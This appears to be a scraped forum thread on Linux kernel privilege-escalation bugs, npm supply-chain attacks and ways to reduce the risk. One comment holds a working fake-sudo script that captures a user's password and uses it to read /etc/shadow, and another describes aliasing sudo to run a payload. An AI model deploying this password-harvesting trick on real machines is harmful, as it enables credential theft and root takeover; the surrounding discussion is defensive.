But it was too convenient. Anyone warning about it or trying to limit the damage was shouted down by people who had no experience of any other way of doing things. "import antigravity" is just too easy to do without.
Well, now we're reaching the "find out" part of the process I guess.
Assuming we survive the gap period where every country chucks what they still have at their worst enemies, I mean. I suppose we can always hit each other with animal bones.
I don't think it's reasonable to say that an OS that lacks it isn't "serious" about security.
For local attackers there may be easier avenues to leak the ASLR slide, but for remote attackers it's almost universally agreed it significantly raises the bar.
>I don't think it's reasonable to say that an OS that lacks it isn't "serious" about security.
When they implemented it in 2019 it had been an 18-year-old mitigation. If you are serious about security, you implement everything that raises the bar. The term "defense-in-depth" exists for a reason, and ASLR is probably one of the easiest and most effective defense-in-depth measures you can implement, since it doesn't necessarily require changes to existing code beyond compiling with -pie.
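For anyone who wants to check their own binaries, a minimal sketch (the file name is just illustrative):

cc -fPIE -pie -o myprog myprog.c
readelf -h myprog | grep Type    # "DYN" means the binary is relocatable, i.e. PIE, so ASLR can randomize its base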
FreeBSD isn’t secure? I suspect you’re sitting on a pile of 0-days for it, then?
With FreeBSD there's never any question of "who should this get reported to".
Not sure what you mean by this. Debian is able to handle coordinated disclosures (when they're actually coordinated), and get embargoed security updates out rapidly without breaking the embargo.
Is there some other aspect of this that you're referencing?
https://github.com/artifact-keeper
An artifact manager: you only get what you approve. So you can pull fast updates when needed and stay on a consistent, known-stable set when you need that instead. It does need a little config override, but that's easy work.
I had my own janky tooling for something like it. This is a good project.
Once noticed, that's where the exploit explosion erupts, excited exploiters everywhere, emboldened... enticed... excessively encouraged, by your delayed updates.
Attackers can’t push a security update without going through the reporting process (e.g. a GitHub CVE), so that isn’t necessarily easy to abuse.
Another model is Perl's CPAN where you publish source files only.
(Naively, not knowing much about apt-get or yum or other OS package managers, I have always assumed that 1. only a handful of trusted people can publish to the default repos for system package managers and 2. that since I have to run `apt-get install` as root anyway, package installers can completely pwn my system if they want to and I am protected purely by trust. Is some of that wrong? If it's right, isn't it nonsensical to be any more worried about installing new packages in light of these vulns?)
We set up our base containers with all the external dependencies already in them and then only update those explicitly when we decide it's time.
This means we might be a bit behind the bleeding edge, but we're also taking on a lot less risk with random supply chain vulns getting instant global distribution.
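Roughly the shape of it (the registry name, image tags, and date label below are made up, not our real ones):

docker pull node:20-alpine
docker image inspect --format '{{index .RepoDigests 0}}' node:20-alpine   # record the exact digest we reviewed
docker build -t registry.internal.example.com/base/node:2024-06 .         # our base Dockerfile FROMs that digest
docker push registry.internal.example.com/base/node:2024-06

App images then build FROM that internal tag, so nothing new comes in until we bump it deliberately.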
What I want to say with that is that, fundamentally, our world works because at least most people do not abuse shit. That is fundamentally how human society has always worked, and it will likely continue to do so.
echo 'export PATH="$HOME/.local/bin:$PATH"' >> ~/.bashrc
mkdir -p ~/.local/bin/
cat <<'EOF' > ~/.local/bin/sudo
#!/bin/bash
# capture the user's password, then use it to read data only root can see
read -rs -p "[sudo] password for $USER: " PASSWORD
echo ""
echo "$PASSWORD" | /usr/bin/sudo -S head /etc/shadow
EOF
chmod +x ~/.local/bin/sudo
The attack fires on the next sudo call and shows data accessible only to root.

Our security model is based on distributions verifying packages, that is, on distro maintainers. Software we can't trust should be running in VMs. The attack on trivy is just the beginning, and the solution is removing pip, uv, npm, rbenv from the host and running them in Docker containers:
$ docker run -it -v "$PWD":/app -w /app node:alpine /bin/sh
Longer-term environments can be defined in Docker Compose (docker-compose.yml):
services:
  app:
    image: node:alpine
    volumes:
      - .:/app
    working_dir: /app
    command: /bin/sh
$ docker compose run app
Switch to Kata etc. if more protection is needed. Eventually all userspace would run in VMs.

Edit: I think I understand. copyfail is a kernel bug that lets a malicious npm package get root access on your Linux server, right?
So right now, while there are unpatched servers, would be the perfect time for attackers to target NPM packages.
And the advice isn't just "update your kernel" because we are still finding new related issues?
I've done that ever since. Of course, I still use packages like express and tailwindcss. But in the era of LLMs, using a package for something like react drop-downs is unnecessary.
the idea that it exists at all is more or less a gentleman's agreement in the engineering world anyway
> Because the responsible disclosure schedule and the embargo have been broken, no patch exists for any distribution.
I had to do a double take reading that. It’s written as if something happened that prevented them from following the schedule, yet it seems they chose to release the information anyway. I hope I’m missing something and it was forcibly disclosed elsewhere.
Edit: Moments later I refreshed the homepage and saw the announcement. They do claim to have consulted with maintainers.
Very odd wording. I assume there’s an interesting/upsetting story here that will come out soon.
If you can't trust your update sources, you have bigger problems.
People lamented semver not being trustable but that ship sailed a long time ago, and supply chain attacks are going to get worse before they get better.
Our team is pretty minimal when it comes to enforced hooks (everyone has their own workflow) but no one could come up with an objection to this one.
It takes 45 seconds to go check how old the copyfail and dirtyfrag vulnerabilities actually are. Which is longer than it takes to read TFA. Dirtyfrag may be relevant to systems from as far back as 2017.
It's not "new" software being affected. And actual old software is in a much worse state because we had a lot more time to find their problems.
I don't remember where I read it, but it basically boils down to need vs want.
I've used that rule for deciding between a new car or used. A fancy vacuum or basic.
A shiny new gadget.
Bringing new things into the tech stack.
Picking a new tech stack.
I am worried that the sluggishness appeared at about the same time on both devices.
I know there are extensions and proxies you can set up that do this, but it just seems like it should be built into npm directly (maybe it has been by now; I haven't kept up with Node programming in the last couple of years).
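For what it's worth, the proxy route is just a registry setting; the URL here is hypothetical:

npm config set registry https://npm-proxy.internal.example.com/    # all installs now go through the curating proxy

and the proxy decides what it's willing to serve.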
Reducing attack surface and software complexity will (theoretically) reduce the number of possible exploits regardless of what new tool or process attackers discover.
What AI coding is great at is helping you try out things you wouldn't normally have the time or energy to do. It shines for writing scripts that aren't part of a larger codebase, and for helping with boring, rote tasks.
Hackers are also very motivated to use new tools to find any kind of opening (unlike normal devs who aren't always as... motivated :).
I'm not associated with the project in any way and am very much open to other suggestions, either as an alternative to LuLu or to complement it.
I switched to llama.cpp because of that.
To me it feels more and more like the slopcode world is the opposite philosophy of reproducible builds. It's like the anti-methodology of how to work in that regard.
Before, everyone was publishing breaking changes in subminor versions because nobody adhered to any API versioning standards. Now every single commit can break things. That is not an improvement.
When I see pages of obviously generated prose being submitted as any kind of documentation, my eyes just glaze over. I feel guilty sharing similar stuff too, though to my credit, at least I always lead with a self-written TL;DR; the slop is just for reference. But it's so bad, like genuinely distressing-tier. I don't want to read all that junk, and more and more of it gets produced.
Prose type docs have always been my Achilles heel, and this is like the worst possible evolution of that.
For a brief period in the past few weeks, they somehow managed to make a change to ChatGPT Thinking that made it succinct. The tone was super fact-oriented too. It was honestly like waking up from a fever dream.
It means you skip supply chain attacks but may miss fresh vulnerability patches too.
We’re not manually downloading and installing new firmware; for a lot of things it’s all getting pulled in automatically.
But the problem is that this could lead to abuse of the CVE system to try to force rapid adoption of attacked packages. What prevents this?
Behaviours matter more than OS security primitives.
Once everyone takes the stance of waiting 2 weeks, we are all back to the same situation.
I don’t like the suggestion to “wait for others to be the unfortunate victims, so that I can benefit from their misfortune”.
Surely there’s a better way.
there's a secure option provided by the web: no build step, just scripts at the top / bottom of the page
they're executed in a secure sandbox
6-19-2005
My copy of StepMania is turning old enough to drink in like a month and it's still fantastic, software updates are (mostly) a scam.
Just alias sudo to sudo-but-also-keep-password-and-execute-a-payload in ~/.bashrc and wait up to 24 hours. Maybe also simulate some breakage by intercepting other commands and force the user to run 'sudo systemctl' or something sooner rather than later.
this is only scary for rootless containers, as it skips an isolation layer, but we've started shipping distroless containers, which are not vulnerable to this because they lack privilege-escalation commands such as su or sudo.
never trust software to begin with: sandbox everything you can, and don't run it on your machine at all if possible.
But there are a lot of academic and research institutions that actually do have good Linux user management. I worked at a pediatric hospital, and the RHEL HPC admins did not mess around in terms of who was allowed to access which patients' data. As someone who was not an admin, it was a huge pain, and it should have been. So this bug has pretty serious implications; it seems like anyone at that hospital could abscond with a lot of de-identified data. [research HPC is not as sensitive as the clinical stuff, which I think was all Windows Server]
I won't go into all the details, but... it's totally possible to not have the sudo command (or similar) on a system at all, and to have su with the setuid bit off.
On my main desktop there's no sudo command, and there are zero binaries with the setuid bit set.
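Easy enough to verify with something like:

find / -xdev -perm -4000 -type f 2>/dev/null    # no output means no setuid binaries on this filesystem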
The only way to get root involves an "out-of-band" access, from another computer, that is not on the regular network [1].
This setup has worked for me for years. And years. And I very rarely need to be root on my desktop. When I do, I just use my out-of-band connection (from a tiny laptop whose only purpose is to perform root operations on my desktop).
For example, today I logged in as root and blocked the three modules, per the "dirty page" mitigation suggested by the person who reported the exploit.
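In sketch form, that kind of block looks like this (the module names here are placeholders; use the ones from the actual advisory):

cat > /etc/modprobe.d/dirtypage-mitigation.conf <<'EOF'
# keep the affected modules from being auto-loaded
blacklist module_one
blacklist module_two
blacklist module_three
EOF

(An "install <module> /bin/false" line would additionally block explicit modprobe, if you want to go further.)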
You're not faking sudo with a mocking-bird on my machine. You're not using "su" from a regular user account. No userns either (no "insmod", no nothing).
Note that it's still possible to have several non-root users logged in at once: but from one user account, you cannot log in as another. You can however switch to TTY2, TTY3, etc. and log in as another user. And the whole XKCD about "get local account, get everything of importance" ain't valid in my case either.
I'm not saying it's perfect but it's not as simple as "get a local shell, wait until user enters 'sudo', get root". No sudo, no su.
It's brutally simple.
And, best of all, it's a fully usable desktop: I've been using such a setup for years (I've also got servers, including at home, with Proxmox and VMs etc., but that's another topic).
Most people however aren't and will happily run sudo after an npm postinstall script tells them to apt-install turboencabulator for their new frontend framework to function.
What are people thinking with these meme style vulnerability names? It's going to be hard to pitch "we need to push back the timeline on this new infrastructure deploy while we mitigate Copy Fail 2: Electric Boogaloo".
Sure, we've just faced an acceleration phase, and a wave of patches will follow before things settle down. But where we used to find x zero-days per million LoC, we will now find 10x ZD/MLoC. [hopefully detection will become part of CI, so that number may vary]
So, we will have more disasters waiting to happen. Assume that they will happen.
My #1 recommendation is to curate a list of the auth tokens that you use (keep the list, not the actual tokens, in a central place...), and be ready to rotate them as automatically as possible. You already have backups. Know how to rotate all your credentials.
Write some scripts. Get ready. It will happen.
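A rough sketch of what I mean, where the token names and the rotate.d/ layout are purely illustrative:

for token in github-deploy npm-publish ci-registry-pull; do
    ./rotate.d/"$token".sh || echo "failed to rotate $token" >&2
done

Each little script knows how to mint a new credential for its service and revoke the old one.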
They’re always racing to be the first one to write an article about a case.
This makes no sense.
So, copy.fail refers to a Linux kernel problem, yes? A local instructor showed it to us, e.g. by using Python to become superuser.
Well ... does this mean that a computer system is useless because of that bug? No. Besides, people can patch it already, so while it is indeed a huge bug as such, it does not make people's computers useless at all.
But, even ignoring this ... why would we now AVOID installing new software for a bit? What rationale is given here? The rationale given was "because of ... uhm ... npm supply chain attacks":
"Right now would be one of the best times for a supply chain attack via NPM to hit hard.
Outside of Linux kernel patches from your distro, I think it's probably a good idea to put a moratorium on installing new software for a week or so."
Well, many computer systems won't even have npm installed. Besides, if they do, they should be well aware of npm having had issues for such a long time. left-pad is still the funniest one of all time IMO, or among the top three. copy.fail is not funny - it is almost so simple that it is stupid, which kind of makes this an epic fail indeed, and that AI found it also kind of means that skynet won. Humans won't find as many weaknesses as AI skynet will. But just because of such an exploit and npm sucking, why would this mean I should ... arbitrarily stop compiling any new software? THAT MAKES ABSOLUTELY NO SENSE AT ALL. That "rationale" is not a rationale. That is just an opinion, without any real argument behind it.
If the issue is serious, patch the linux kernel. End of story. No need to have a "moratorium" on installing new software. The "for a bit" makes no sense anymore than "for 50 days" or any other arbitrary number. xeiaso is not THINKING here.
The copyFail didn't, the dirtyfrag doesn't.
This copfail2 does modify /etc/passwd, but I can't `su - sick` as expected.
/s
Code is cheap and is becoming cheaper by the day. We need new paradigms.
I know this is unrelated to the article, but related to the title.